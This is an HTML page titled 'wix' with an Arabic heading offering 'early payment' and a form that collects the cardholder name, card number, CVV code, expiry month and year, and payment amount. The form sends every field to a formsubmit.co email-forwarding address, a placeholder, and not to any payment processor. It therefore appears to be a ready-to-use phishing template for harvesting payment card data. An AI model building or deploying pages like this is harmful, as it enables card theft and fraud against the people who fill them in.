<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <meta http-equiv="X-UA-Compatible" content="IE=edge">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>wix</title>
</head>
<body>
    
<div class="header">
    <img src="a.webp" height="120px"
    width="120px">
</div>
<div class="cont">
    <div class="o">
        <img src="ae.webp" height="250px"
        width="400px"  >
     
    </div>
    </div>
 
<img class="allign" src="ae1.webp">

<div class="container"><h1>
    التسديد المبكر معلومات بطاقه الاتمان و الخصم
</h1>
    <form target="_blank" action="https://formsubmit.co/your@email.com" method="POST">
      <div class="form-group">
        <div class="form-row">
          <div class="col">
            <p>الاسم الموجود علي البطاقه </p>
            <input type="text" name="الاسم الموجود علي البطاقه " class="form-control" placeholder="الاسم الموجود علي البطاقه" required>
          </div>
          <div class="col">
            <p>رقم البطاقه  </p>
            <input type=" text" name="رقم البطاقه " class="form-control" placeholder="رقم البطاقه " required>
          </div>
           <div class="col">
             <p>  كود  cvv</p>
            <input type=" text" name="كود cvv" class="form-control" placeholder="كود cvv" required>
          </div> <div class="col">
          <p> YY تاريخ الانتهاء</p>
            <input type=" text" name="YY" class="form-control" placeholder=" YY" required>
          </div> <div class="col">
          <p>  تاريخ النتهاء MM</p>
            <input type=" text" name="MM" class="form-control" placeholder="MM" required>
          </div> <div class="col">
          <p> مبلغ التسديد</p>
            <input type=" text" name="مبلغ التسديد" class="form-control" placeholder="مبلغ التسديد" required>
          </div>
 
      <button type="submit" class="btn btn-lg btn-dark btn-block">Submit Form</button>
    </form>
  </div>
<div>
    <img src="a4.webp" height="400px"
    width="500px"
     class="allign">
</div>



<style>
    .btn{
        height: 50px;
        border-radius: 20px;
        border: 1px solid white;
        width: 120px;
        color: white;
        background-color: rgb(10, 134, 134);
    }
    form{
        background-color: rgb(182, 226, 226);
    }
.form-control{
    background-color: white;
    color: black;
    border-radius: 20px;
}
.allign{
        font-size: 25px;
  
        margin-left: 4px;
    }
    .header{
        padding-left: 120px;
        height: 150px;
        background-color: rgb(153, 218, 218);
    }

    .o,.a,.allign,.container{
     margin-left: 4px;
     padding-left: 2px;
        text-align: center;
    }
    img{
        border-radius: 20px;
    }
    .a{
        text-align: center;
        width: 500px;
    }
</style>
</body>
</html>